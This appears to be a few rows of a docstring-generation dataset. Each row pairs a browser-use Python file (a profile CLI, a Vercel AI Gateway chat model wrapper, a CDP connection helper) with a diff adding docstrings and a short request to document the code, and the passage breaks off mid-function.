+ """Handle profile subcommands.
+
+ Routes to local or cloud implementation based on browser mode.
+ """
command = args.profile_command
# Commands that don't need mode inference
@@ -91,6 +112,7 @@
def _print_usage() -> None:
+ """Print profile command usage."""
print('Usage: browser-use [-b real|remote] profile <command>')
print()
print('Commands:')
@@ -113,6 +135,7 @@
def _handle_list(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile list' command."""
if mode == 'real':
return _list_local_profiles(args)
else:
@@ -120,6 +143,7 @@
def _list_local_profiles(args: argparse.Namespace) -> int:
+ """List local Chrome profiles."""
profiles = list_local_chrome_profiles()
if getattr(args, 'json', False):
@@ -136,6 +160,7 @@
def _list_cloud_profiles(args: argparse.Namespace) -> int:
+ """List cloud profiles."""
from browser_use.skill_cli.api_key import APIKeyRequired
page = getattr(args, 'page', 1)
@@ -178,6 +203,7 @@
def _handle_get(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile get <id>' command."""
if mode == 'real':
return _get_local_profile(args)
else:
@@ -185,6 +211,7 @@
def _get_local_profile(args: argparse.Namespace) -> int:
+ """Get local Chrome profile details."""
profiles = list_local_chrome_profiles()
profile_id = args.id
@@ -203,6 +230,7 @@
def _get_cloud_profile(args: argparse.Namespace) -> int:
+ """Get cloud profile details."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -241,6 +269,7 @@
def _handle_create(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile create' command."""
if mode == 'real':
print('Error: Cannot create local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser to create new profiles.', file=sys.stderr)
@@ -250,6 +279,7 @@
def _create_cloud_profile(args: argparse.Namespace) -> int:
+ """Create a cloud profile."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -279,6 +309,7 @@
def _handle_update(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile update <id>' command."""
if mode == 'real':
print('Error: Cannot update local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to update profiles.', file=sys.stderr)
@@ -288,6 +319,7 @@
def _update_cloud_profile(args: argparse.Namespace) -> int:
+ """Update a cloud profile."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -317,6 +349,7 @@
def _handle_delete(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile delete <id>' command."""
if mode == 'real':
print('Error: Cannot delete local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to remove profiles.', file=sys.stderr)
@@ -326,6 +359,7 @@
def _delete_cloud_profile(args: argparse.Namespace) -> int:
+ """Delete a cloud profile."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -352,6 +386,7 @@
def _handle_cookies(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile cookies <id>' command."""
if mode == 'remote':
print('Error: Cookie listing is only available for local Chrome profiles.', file=sys.stderr)
print('Use -b real to access local profile cookies.', file=sys.stderr)
@@ -361,6 +396,7 @@
def _list_profile_cookies(args: argparse.Namespace) -> int:
+ """List cookies by domain in a local Chrome profile."""
import asyncio
from browser_use.skill_cli.sessions import create_browser_session
@@ -436,6 +472,7 @@
def _handle_sync(args: argparse.Namespace) -> int:
+ """Handle 'profile sync' command - sync local profile to cloud."""
import asyncio
from browser_use.skill_cli.api_key import APIKeyRequired
@@ -520,6 +557,7 @@ log(f' ✓ Created: {cloud_profile_id}')
def cleanup_cloud_profile() -> None:
+ """Delete the cloud profile on failure."""
try:
client.profiles.delete_browser_profile(cloud_profile_id)
except Exception:
@@ -632,6 +670,7 @@
def list_local_chrome_profiles() -> list[dict[str, Any]]:
+ """List local Chrome profiles from the Local State file."""
import platform
# Find Chrome Local State file
@@ -661,4 +700,4 @@ )
return profiles
except Exception:
- return []+ return []
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/profile.py |
Help me add docstrings to my project | import json
import os
from collections.abc import Mapping
from dataclasses import dataclass, field
from typing import Any, Literal, TypeAlias, TypeVar, overload
import httpx
from openai import APIConnectionError, APIStatusError, AsyncOpenAI, RateLimitError
from openai.types.chat.chat_completion import ChatCompletion
from openai.types.shared_params.response_format_json_schema import (
JSONSchema,
ResponseFormatJSONSchema,
)
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage, ContentPartTextParam, SystemMessage
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.vercel.serializer import VercelMessageSerializer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
# Structured-output schema type used by ainvoke; bound to pydantic BaseModel.
T = TypeVar('T', bound=BaseModel)
# Known model ids routable through the Vercel AI Gateway ('provider/model' form).
# Advisory only: ChatVercel.model is typed `ChatVercelModel | str`, so any plain
# string is accepted and brand-new gateway models work without updating this list.
ChatVercelModel: TypeAlias = Literal[
	'alibaba/qwen-3-14b',
	'alibaba/qwen-3-235b',
	'alibaba/qwen-3-30b',
	'alibaba/qwen-3-32b',
	'alibaba/qwen3-235b-a22b-thinking',
	'alibaba/qwen3-coder',
	'alibaba/qwen3-coder-30b-a3b',
	'alibaba/qwen3-coder-next',
	'alibaba/qwen3-coder-plus',
	'alibaba/qwen3-embedding-0.6b',
	'alibaba/qwen3-embedding-4b',
	'alibaba/qwen3-embedding-8b',
	'alibaba/qwen3-max',
	'alibaba/qwen3-max-preview',
	'alibaba/qwen3-max-thinking',
	'alibaba/qwen3-next-80b-a3b-instruct',
	'alibaba/qwen3-next-80b-a3b-thinking',
	'alibaba/qwen3-vl-instruct',
	'alibaba/qwen3-vl-thinking',
	'alibaba/qwen3.5-flash',
	'alibaba/qwen3.5-plus',
	'alibaba/wan-v2.5-t2v-preview',
	'alibaba/wan-v2.6-i2v',
	'alibaba/wan-v2.6-i2v-flash',
	'alibaba/wan-v2.6-r2v',
	'alibaba/wan-v2.6-r2v-flash',
	'alibaba/wan-v2.6-t2v',
	'amazon/nova-2-lite',
	'amazon/nova-lite',
	'amazon/nova-micro',
	'amazon/nova-pro',
	'amazon/titan-embed-text-v2',
	'anthropic/claude-3-haiku',
	'anthropic/claude-3-opus',
	'anthropic/claude-3.5-haiku',
	'anthropic/claude-3.5-sonnet',
	'anthropic/claude-3.5-sonnet-20240620',
	'anthropic/claude-3.7-sonnet',
	'anthropic/claude-haiku-4.5',
	'anthropic/claude-opus-4',
	'anthropic/claude-opus-4.1',
	'anthropic/claude-opus-4.5',
	'anthropic/claude-opus-4.6',
	'anthropic/claude-sonnet-4',
	'anthropic/claude-sonnet-4.5',
	'anthropic/claude-sonnet-4.6',
	'arcee-ai/trinity-large-preview',
	'arcee-ai/trinity-mini',
	'bfl/flux-kontext-max',
	'bfl/flux-kontext-pro',
	'bfl/flux-pro-1.0-fill',
	'bfl/flux-pro-1.1',
	'bfl/flux-pro-1.1-ultra',
	'bytedance/seed-1.6',
	'bytedance/seed-1.8',
	'bytedance/seedance-v1.0-lite-i2v',
	'bytedance/seedance-v1.0-lite-t2v',
	'bytedance/seedance-v1.0-pro',
	'bytedance/seedance-v1.0-pro-fast',
	'bytedance/seedance-v1.5-pro',
	'cohere/command-a',
	'cohere/embed-v4.0',
	'deepseek/deepseek-r1',
	'deepseek/deepseek-v3',
	'deepseek/deepseek-v3.1',
	'deepseek/deepseek-v3.1-terminus',
	'deepseek/deepseek-v3.2',
	'deepseek/deepseek-v3.2-thinking',
	'google/gemini-2.0-flash',
	'google/gemini-2.0-flash-lite',
	'google/gemini-2.5-flash',
	'google/gemini-2.5-flash-image',
	'google/gemini-2.5-flash-lite',
	'google/gemini-2.5-flash-lite-preview-09-2025',
	'google/gemini-2.5-flash-preview-09-2025',
	'google/gemini-2.5-pro',
	'google/gemini-3-flash',
	'google/gemini-3-pro-image',
	'google/gemini-3-pro-preview',
	'google/gemini-3.1-flash-image-preview',
	'google/gemini-3.1-flash-lite-preview',
	'google/gemini-3.1-pro-preview',
	'google/gemini-embedding-001',
	'google/imagen-4.0-fast-generate-001',
	'google/imagen-4.0-generate-001',
	'google/imagen-4.0-ultra-generate-001',
	'google/text-embedding-005',
	'google/text-multilingual-embedding-002',
	'google/veo-3.0-fast-generate-001',
	'google/veo-3.0-generate-001',
	'google/veo-3.1-fast-generate-001',
	'google/veo-3.1-generate-001',
	'inception/mercury-2',
	'inception/mercury-coder-small',
	'klingai/kling-v2.5-turbo-i2v',
	'klingai/kling-v2.5-turbo-t2v',
	'klingai/kling-v2.6-i2v',
	'klingai/kling-v2.6-motion-control',
	'klingai/kling-v2.6-t2v',
	'klingai/kling-v3.0-i2v',
	'klingai/kling-v3.0-t2v',
	'kwaipilot/kat-coder-pro-v1',
	'meituan/longcat-flash-chat',
	'meituan/longcat-flash-thinking',
	'meta/llama-3.1-70b',
	'meta/llama-3.1-8b',
	'meta/llama-3.2-11b',
	'meta/llama-3.2-1b',
	'meta/llama-3.2-3b',
	'meta/llama-3.2-90b',
	'meta/llama-3.3-70b',
	'meta/llama-4-maverick',
	'meta/llama-4-scout',
	'minimax/minimax-m2',
	'minimax/minimax-m2.1',
	'minimax/minimax-m2.1-lightning',
	'minimax/minimax-m2.5',
	'minimax/minimax-m2.5-highspeed',
	'mistral/codestral',
	'mistral/codestral-embed',
	'mistral/devstral-2',
	'mistral/devstral-small',
	'mistral/devstral-small-2',
	'mistral/magistral-medium',
	'mistral/magistral-small',
	'mistral/ministral-14b',
	'mistral/ministral-3b',
	'mistral/ministral-8b',
	'mistral/mistral-embed',
	'mistral/mistral-large-3',
	'mistral/mistral-medium',
	'mistral/mistral-nemo',
	'mistral/mistral-small',
	'mistral/mixtral-8x22b-instruct',
	'mistral/pixtral-12b',
	'mistral/pixtral-large',
	'moonshotai/kimi-k2',
	'moonshotai/kimi-k2-0905',
	'moonshotai/kimi-k2-thinking',
	'moonshotai/kimi-k2-thinking-turbo',
	'moonshotai/kimi-k2-turbo',
	'moonshotai/kimi-k2.5',
	'morph/morph-v3-fast',
	'morph/morph-v3-large',
	'nvidia/nemotron-3-nano-30b-a3b',
	'nvidia/nemotron-nano-12b-v2-vl',
	'nvidia/nemotron-nano-9b-v2',
	'openai/gpt-3.5-turbo',
	'openai/gpt-3.5-turbo-instruct',
	'openai/gpt-4-turbo',
	'openai/gpt-4.1',
	'openai/gpt-4.1-mini',
	'openai/gpt-4.1-nano',
	'openai/gpt-4o',
	'openai/gpt-4o-mini',
	'openai/gpt-4o-mini-search-preview',
	'openai/gpt-5',
	'openai/gpt-5-chat',
	'openai/gpt-5-codex',
	'openai/gpt-5-mini',
	'openai/gpt-5-nano',
	'openai/gpt-5-pro',
	'openai/gpt-5.1-codex',
	'openai/gpt-5.1-codex-max',
	'openai/gpt-5.1-codex-mini',
	'openai/gpt-5.1-instant',
	'openai/gpt-5.1-thinking',
	'openai/gpt-5.2',
	'openai/gpt-5.2-chat',
	'openai/gpt-5.2-codex',
	'openai/gpt-5.2-pro',
	'openai/gpt-5.3-chat',
	'openai/gpt-5.3-codex',
	'openai/gpt-5.4',
	'openai/gpt-5.4-pro',
	'openai/gpt-image-1',
	'openai/gpt-image-1-mini',
	'openai/gpt-image-1.5',
	'openai/gpt-oss-120b',
	'openai/gpt-oss-20b',
	'openai/gpt-oss-safeguard-20b',
	'openai/o1',
	'openai/o3',
	'openai/o3-deep-research',
	'openai/o3-mini',
	'openai/o3-pro',
	'openai/o4-mini',
	'openai/text-embedding-3-large',
	'openai/text-embedding-3-small',
	'openai/text-embedding-ada-002',
	'perplexity/sonar',
	'perplexity/sonar-pro',
	'perplexity/sonar-reasoning',
	'perplexity/sonar-reasoning-pro',
	'prime-intellect/intellect-3',
	'recraft/recraft-v2',
	'recraft/recraft-v3',
	'recraft/recraft-v4',
	'recraft/recraft-v4-pro',
	'stealth/sonoma-dusk-alpha',
	'stealth/sonoma-sky-alpha',
	'vercel/v0-1.0-md',
	'vercel/v0-1.5-md',
	'voyage/voyage-3-large',
	'voyage/voyage-3.5',
	'voyage/voyage-3.5-lite',
	'voyage/voyage-4',
	'voyage/voyage-4-large',
	'voyage/voyage-4-lite',
	'voyage/voyage-code-2',
	'voyage/voyage-code-3',
	'voyage/voyage-finance-2',
	'voyage/voyage-law-2',
	'xai/grok-2-vision',
	'xai/grok-3',
	'xai/grok-3-fast',
	'xai/grok-3-mini',
	'xai/grok-3-mini-fast',
	'xai/grok-4',
	'xai/grok-4-fast-non-reasoning',
	'xai/grok-4-fast-reasoning',
	'xai/grok-4.1-fast-non-reasoning',
	'xai/grok-4.1-fast-reasoning',
	'xai/grok-4.20-multi-agent-beta',
	'xai/grok-4.20-non-reasoning-beta',
	'xai/grok-4.20-reasoning-beta',
	'xai/grok-code-fast-1',
	'xai/grok-imagine-image',
	'xai/grok-imagine-image-pro',
	'xai/grok-imagine-video',
	'xiaomi/mimo-v2-flash',
	'zai/glm-4.5',
	'zai/glm-4.5-air',
	'zai/glm-4.5v',
	'zai/glm-4.6',
	'zai/glm-4.6v',
	'zai/glm-4.6v-flash',
	'zai/glm-4.7',
	'zai/glm-4.7-flashx',
	'zai/glm-5',
]
@dataclass
class ChatVercel(BaseChatModel):
# Model configuration
model: ChatVercelModel | str
# Model params
temperature: float | None = None
max_tokens: int | None = None
top_p: float | None = None
reasoning_models: list[str] | None = field(
default_factory=lambda: [
'o1',
'o3',
'o4',
'gpt-oss',
'gpt-5.2-pro',
'gpt-5.4-pro',
'deepseek-r1',
'-thinking',
'perplexity/sonar-reasoning',
]
)
# Client initialization parameters
api_key: str | None = None
base_url: str | httpx.URL = 'https://ai-gateway.vercel.sh/v1'
timeout: float | httpx.Timeout | None = None
max_retries: int = 5
default_headers: Mapping[str, str] | None = None
default_query: Mapping[str, object] | None = None
http_client: httpx.AsyncClient | None = None
_strict_response_validation: bool = False
provider_options: dict[str, Any] | None = None
reasoning: dict[str, dict[str, Any]] | None = None
model_fallbacks: list[str] | None = None
caching: Literal['auto'] | None = None
# Static
	@property
	def provider(self) -> str:
		"""Return the constant provider identifier, ``'vercel'``."""
		return 'vercel'
	def _get_client_params(self) -> dict[str, Any]:
		"""Assemble keyword arguments for the AsyncOpenAI client constructor.

		Edge cases:
		- If ``self.api_key`` is unset, falls back to the ``AI_GATEWAY_API_KEY``
		  and then ``VERCEL_OIDC_TOKEN`` environment variables. If none are set,
		  ``api_key`` ends up None and is dropped from the result entirely
		  (the SDK's own default/error handling then applies).
		- Every None-valued entry is filtered out, so the client library uses
		  its defaults instead of receiving explicit Nones.
		- ``http_client`` is added separately after the None-filter so a
		  caller-supplied client is always passed through.
		"""
		api_key = self.api_key or os.getenv('AI_GATEWAY_API_KEY') or os.getenv('VERCEL_OIDC_TOKEN')
		base_params = {
			'api_key': api_key,
			'base_url': self.base_url,
			'timeout': self.timeout,
			'max_retries': self.max_retries,
			'default_headers': self.default_headers,
			'default_query': self.default_query,
			'_strict_response_validation': self._strict_response_validation,
		}
		# Drop None values so the SDK's own defaults take effect
		client_params = {k: v for k, v in base_params.items() if v is not None}
		if self.http_client is not None:
			client_params['http_client'] = self.http_client
		return client_params
	def get_client(self) -> AsyncOpenAI:
		"""Return the AsyncOpenAI client pointed at the Vercel AI Gateway.

		The client is created lazily on first call and cached on the instance
		(``self._client``), so connection settings changed after the first
		call have no effect on subsequent calls.
		"""
		if not hasattr(self, '_client'):
			client_params = self._get_client_params()
			self._client = AsyncOpenAI(**client_params)
		return self._client
	@property
	def name(self) -> str:
		"""Return the configured model identifier coerced to ``str``."""
		return str(self.model)
	def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
		"""Extract normalized token usage from a chat completion response.

		Edge cases:
		- Returns None when ``response.usage`` is absent.
		- ``prompt_tokens_details`` may be missing from the usage object
		  (getattr default None); the cached-token count is then reported as
		  None rather than 0, distinguishing "unknown" from "no cache hits".
		"""
		if response.usage is None:
			return None
		# prompt_tokens_details is an optional field in the OpenAI schema
		prompt_details = getattr(response.usage, 'prompt_tokens_details', None)
		cached_tokens = prompt_details.cached_tokens if prompt_details else None
		return ChatInvokeUsage(
			prompt_tokens=response.usage.prompt_tokens,
			prompt_cached_tokens=cached_tokens,
			prompt_cache_creation_tokens=None,  # not populated from this response shape
			prompt_image_tokens=None,  # not populated from this response shape
			completion_tokens=response.usage.completion_tokens,
			total_tokens=response.usage.total_tokens,
		)
	def _fix_gemini_schema(self, schema: dict[str, Any]) -> dict[str, Any]:
		"""Rewrite a Pydantic-generated JSON schema into a Gemini-compatible form.

		Gemini's structured-output schema dialect is stricter than standard
		JSON Schema; this method works around the differences in place:

		Edge cases handled:
		- ``$ref``/``$defs`` indirection is inlined recursively. Sibling keys
		  on a ``$ref`` object are merged over the resolved definition.
		  Resolution only runs when a top-level ``$defs`` key is present;
		  otherwise any ``$ref`` objects pass through untouched.
		- A ``$ref`` whose target is missing from ``$defs`` is returned as-is
		  (minus the already-popped ``$ref`` key), i.e. silently dropped.
		- ``additionalProperties``, ``title`` and ``default`` keys are removed
		  everywhere, and ``'title'`` is also pruned from ``required`` lists.
		- Gemini rejects OBJECT types with empty ``properties``; such objects
		  get a single ``_placeholder`` string property injected instead.
		"""
		# Handle $defs and $ref resolution
		if '$defs' in schema:
			defs = schema.pop('$defs')
			def resolve_refs(obj: Any) -> Any:
				# Recursively replace {'$ref': '#/$defs/Name', ...} with the inlined definition.
				if isinstance(obj, dict):
					if '$ref' in obj:
						ref = obj.pop('$ref')
						ref_name = ref.split('/')[-1]
						if ref_name in defs:
							# Replace the reference with the actual definition
							resolved = defs[ref_name].copy()
							# Merge any additional properties from the reference
							for key, value in obj.items():
								if key != '$ref':
									resolved[key] = value
							return resolve_refs(resolved)
						# Unknown $defs target: keep the (now ref-less) object as-is
						return obj
					else:
						# Recursively process all dictionary values
						return {k: resolve_refs(v) for k, v in obj.items()}
				elif isinstance(obj, list):
					return [resolve_refs(item) for item in obj]
				return obj
			schema = resolve_refs(schema)
		# Remove unsupported properties
		def clean_schema(obj: Any) -> Any:
			# Strip keys Gemini rejects and patch empty OBJECT types.
			if isinstance(obj, dict):
				# Remove unsupported properties
				cleaned = {}
				for key, value in obj.items():
					if key not in ['additionalProperties', 'title', 'default']:
						cleaned_value = clean_schema(value)
						# Handle empty object properties - Gemini doesn't allow empty OBJECT types
						if (
							key == 'properties'
							and isinstance(cleaned_value, dict)
							and len(cleaned_value) == 0
							and isinstance(obj.get('type', ''), str)
							and obj.get('type', '').upper() == 'OBJECT'
						):
							# Convert empty object to have at least one property
							cleaned['properties'] = {'_placeholder': {'type': 'string'}}
						else:
							cleaned[key] = cleaned_value
				# If this is an object type with empty properties, add a placeholder
				if (
					isinstance(cleaned.get('type', ''), str)
					and cleaned.get('type', '').upper() == 'OBJECT'
					and 'properties' in cleaned
					and isinstance(cleaned['properties'], dict)
					and len(cleaned['properties']) == 0
				):
					cleaned['properties'] = {'_placeholder': {'type': 'string'}}
				# Also remove 'title' from the required list if it exists
				if 'required' in cleaned and isinstance(cleaned.get('required'), list):
					cleaned['required'] = [p for p in cleaned['required'] if p != 'title']
				return cleaned
			elif isinstance(obj, list):
				return [clean_schema(item) for item in obj]
			return obj
		return clean_schema(schema)
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
vercel_messages = VercelMessageSerializer.serialize_messages(messages)
try:
model_params: dict[str, Any] = {}
if self.temperature is not None:
model_params['temperature'] = self.temperature
if self.max_tokens is not None:
model_params['max_tokens'] = self.max_tokens
if self.top_p is not None:
model_params['top_p'] = self.top_p
extra_body: dict[str, Any] = {}
provider_opts: dict[str, Any] = {}
if self.provider_options:
provider_opts.update(self.provider_options)
if self.reasoning:
# Merge provider-specific reasoning options (ex: {'anthropic': {'thinking': ...}})
for provider_name, opts in self.reasoning.items():
existing = provider_opts.get(provider_name, {})
existing.update(opts)
provider_opts[provider_name] = existing
gateway_opts: dict[str, Any] = provider_opts.get('gateway', {})
if self.model_fallbacks:
gateway_opts['models'] = self.model_fallbacks
if self.caching:
gateway_opts['caching'] = self.caching
if gateway_opts:
provider_opts['gateway'] = gateway_opts
if provider_opts:
extra_body['providerOptions'] = provider_opts
if extra_body:
model_params['extra_body'] = extra_body
if output_format is None:
# Return string response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=vercel_messages,
**model_params,
)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=response.choices[0].message.content or '',
usage=usage,
stop_reason=response.choices[0].finish_reason if response.choices else None,
)
else:
is_google_model = self.model.startswith('google/')
is_anthropic_model = self.model.startswith('anthropic/')
is_reasoning_model = self.reasoning_models and any(
str(pattern).lower() in str(self.model).lower() for pattern in self.reasoning_models
)
if is_google_model or is_anthropic_model or is_reasoning_model:
modified_messages = [m.model_copy(deep=True) for m in messages]
schema = SchemaOptimizer.create_gemini_optimized_schema(output_format)
json_instruction = f'\n\nIMPORTANT: You must respond with ONLY a valid JSON object (no markdown, no code blocks, no explanations) that exactly matches this schema:\n{json.dumps(schema, indent=2)}'
instruction_added = False
if modified_messages and modified_messages[0].role == 'system':
if isinstance(modified_messages[0].content, str):
modified_messages[0].content += json_instruction
instruction_added = True
elif isinstance(modified_messages[0].content, list):
modified_messages[0].content.append(ContentPartTextParam(text=json_instruction))
instruction_added = True
elif modified_messages and modified_messages[-1].role == 'user':
if isinstance(modified_messages[-1].content, str):
modified_messages[-1].content += json_instruction
instruction_added = True
elif isinstance(modified_messages[-1].content, list):
modified_messages[-1].content.append(ContentPartTextParam(text=json_instruction))
instruction_added = True
if not instruction_added:
modified_messages.insert(0, SystemMessage(content=json_instruction))
vercel_messages = VercelMessageSerializer.serialize_messages(modified_messages)
response = await self.get_client().chat.completions.create(
model=self.model,
messages=vercel_messages,
**model_params,
)
content = response.choices[0].message.content if response.choices else None
if not content:
raise ModelProviderError(
message='No response from model',
status_code=500,
model=self.name,
)
try:
text = content.strip()
if text.startswith('```json') and text.endswith('```'):
text = text[7:-3].strip()
elif text.startswith('```') and text.endswith('```'):
text = text[3:-3].strip()
parsed_data = json.loads(text)
parsed = output_format.model_validate(parsed_data)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
stop_reason=response.choices[0].finish_reason if response.choices else None,
)
except (json.JSONDecodeError, ValueError) as e:
raise ModelProviderError(
message=f'Failed to parse JSON response: {str(e)}. Raw response: {content[:200]}',
status_code=500,
model=self.name,
) from e
else:
schema = SchemaOptimizer.create_optimized_json_schema(output_format)
response_format_schema: JSONSchema = {
'name': 'agent_output',
'strict': True,
'schema': schema,
}
response = await self.get_client().chat.completions.create(
model=self.model,
messages=vercel_messages,
response_format=ResponseFormatJSONSchema(
json_schema=response_format_schema,
type='json_schema',
),
**model_params,
)
content = response.choices[0].message.content if response.choices else None
if not content:
raise ModelProviderError(
message='Failed to parse structured output from model response - empty or null content',
status_code=500,
model=self.name,
)
usage = self._get_usage(response)
parsed = output_format.model_validate_json(content)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
stop_reason=response.choices[0].finish_reason if response.choices else None,
)
except RateLimitError as e:
raise ModelRateLimitError(message=e.message, model=self.name) from e
except APIConnectionError as e:
raise ModelProviderError(message=str(e), model=self.name) from e
except APIStatusError as e:
raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -268,6 +268,41 @@
@dataclass
class ChatVercel(BaseChatModel):
+ """
+ A wrapper around Vercel AI Gateway's API, which provides OpenAI-compatible access
+ to various LLM models with features like rate limiting, caching, and monitoring.
+
+ Examples:
+ ```python
+ from browser_use import Agent, ChatVercel
+
+ llm = ChatVercel(model='openai/gpt-4o', api_key='your_vercel_api_key')
+
+ agent = Agent(task='Your task here', llm=llm)
+ ```
+
+ Args:
+ model: The model identifier
+ api_key: Your Vercel AI Gateway API key. If not provided, falls back to
+ AI_GATEWAY_API_KEY or VERCEL_OIDC_TOKEN environment variables.
+ base_url: The Vercel AI Gateway endpoint (defaults to https://ai-gateway.vercel.sh/v1)
+ temperature: Sampling temperature (0-2)
+ max_tokens: Maximum tokens to generate
+ reasoning_models: List of reasoning model patterns (e.g., 'o1', 'gpt-oss') that need
+ prompt-based JSON extraction. Auto-detects common reasoning models by default.
+ timeout: Request timeout in seconds
+ max_retries: Maximum number of retries for failed requests
+ provider_options: Provider routing options for the gateway. Use this to control which
+ providers are used and in what order. Example: {'gateway': {'order': ['vertex', 'anthropic']}}
+ reasoning: Optional provider-specific reasoning configuration. Merged into
+ providerOptions under the appropriate provider key. Example for Anthropic:
+ {'anthropic': {'thinking': {'type': 'adaptive'}}}. Example for OpenAI:
+ {'openai': {'reasoningEffort': 'high', 'reasoningSummary': 'detailed'}}.
+ model_fallbacks: Optional list of fallback model IDs tried in order if the primary
+ model fails. Passed as providerOptions.gateway.models.
+ caching: Optional caching mode for the gateway. Currently supports 'auto', which
+ enables provider-specific prompt caching via providerOptions.gateway.caching.
+ """
# Model configuration
model: ChatVercelModel | str
@@ -310,6 +345,7 @@ return 'vercel'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
api_key = self.api_key or os.getenv('AI_GATEWAY_API_KEY') or os.getenv('VERCEL_OIDC_TOKEN')
base_params = {
@@ -330,6 +366,12 @@ return client_params
def get_client(self) -> AsyncOpenAI:
+ """
+ Returns an AsyncOpenAI client configured for Vercel AI Gateway.
+
+ Returns:
+ AsyncOpenAI: An instance of the AsyncOpenAI client with Vercel base URL.
+ """
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
@@ -340,6 +382,7 @@ return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
+ """Extract usage information from the Vercel response."""
if response.usage is None:
return None
@@ -356,6 +399,12 @@ )
def _fix_gemini_schema(self, schema: dict[str, Any]) -> dict[str, Any]:
+ """
+ Convert a Pydantic model to a Gemini-compatible schema.
+
+ This function removes unsupported properties like 'additionalProperties' and resolves
+ $ref references that Gemini doesn't support.
+ """
# Handle $defs and $ref resolution
if '$defs' in schema:
@@ -437,6 +486,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the model with the given messages through Vercel AI Gateway.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
vercel_messages = VercelMessageSerializer.serialize_messages(messages)
try:
@@ -613,4 +672,4 @@ raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/vercel/chat.py |
Generate consistent documentation across files |
import asyncio
import base64
import json
import sys
import tempfile
from contextlib import asynccontextmanager
from dataclasses import dataclass
from pathlib import Path
from typing import TYPE_CHECKING, Any
if TYPE_CHECKING:
from cdp_use import CDPClient
from browser_use.browser.session import BrowserSession
STATE_FILE = Path(tempfile.gettempdir()) / 'browser-use-direct.json'
# ---------------------------------------------------------------------------
# State persistence
# ---------------------------------------------------------------------------
def _load_state() -> dict[str, Any]:
if STATE_FILE.exists():
try:
return json.loads(STATE_FILE.read_text())
except (json.JSONDecodeError, OSError):
pass
return {}
def _save_state(state: dict[str, Any]) -> None:
STATE_FILE.write_text(json.dumps(state))
def _clear_state() -> None:
STATE_FILE.unlink(missing_ok=True)
# ---------------------------------------------------------------------------
# Selector map cache (persisted in state file under "selector_map" key)
# ---------------------------------------------------------------------------
def _save_selector_cache(selector_map: dict[int, Any]) -> None:
cache: dict[str, dict[str, Any]] = {}
for idx, node in selector_map.items():
pos = getattr(node, 'absolute_position', None)
if pos is None:
continue
text = ''
if hasattr(node, 'ax_node') and node.ax_node and node.ax_node.name:
text = node.ax_node.name
elif hasattr(node, 'node_value') and node.node_value:
text = node.node_value
tag = getattr(node, 'node_name', '') or ''
cache[str(idx)] = {
'x': pos.x,
'y': pos.y,
'w': pos.width,
'h': pos.height,
'tag': tag.lower(),
'text': text[:80],
}
state = _load_state()
state['selector_map'] = cache
_save_state(state)
def _load_selector_cache() -> dict[int, dict[str, Any]]:
state = _load_state()
raw = state.get('selector_map', {})
return {int(k): v for k, v in raw.items()}
# ---------------------------------------------------------------------------
# Tier 1: Lightweight CDP connection (~200ms)
# ---------------------------------------------------------------------------
@dataclass
class LightCDP:
client: 'CDPClient'
session_id: str
target_id: str
@asynccontextmanager
async def _lightweight_cdp():
from cdp_use import CDPClient
state = _load_state()
cdp_url = state.get('cdp_url')
if not cdp_url:
raise RuntimeError('No active browser session')
client = CDPClient(cdp_url)
try:
await client.start()
except Exception as e:
raise RuntimeError(f'Cannot connect to browser at {cdp_url}: {e}') from e
target_id = state.get('target_id')
# If no saved target, discover one
if not target_id:
targets = await client.send.Target.getTargets()
for t in targets.get('targetInfos', []):
if t.get('type') == 'page' and t.get('url', '').startswith(('http://', 'https://')):
target_id = t['targetId']
break
if not target_id:
await client.stop()
raise RuntimeError('No page target found in browser')
# Attach to the target
attach_result = await client.send.Target.attachToTarget(params={'targetId': target_id, 'flatten': True})
session_id = attach_result.get('sessionId')
if not session_id:
await client.stop()
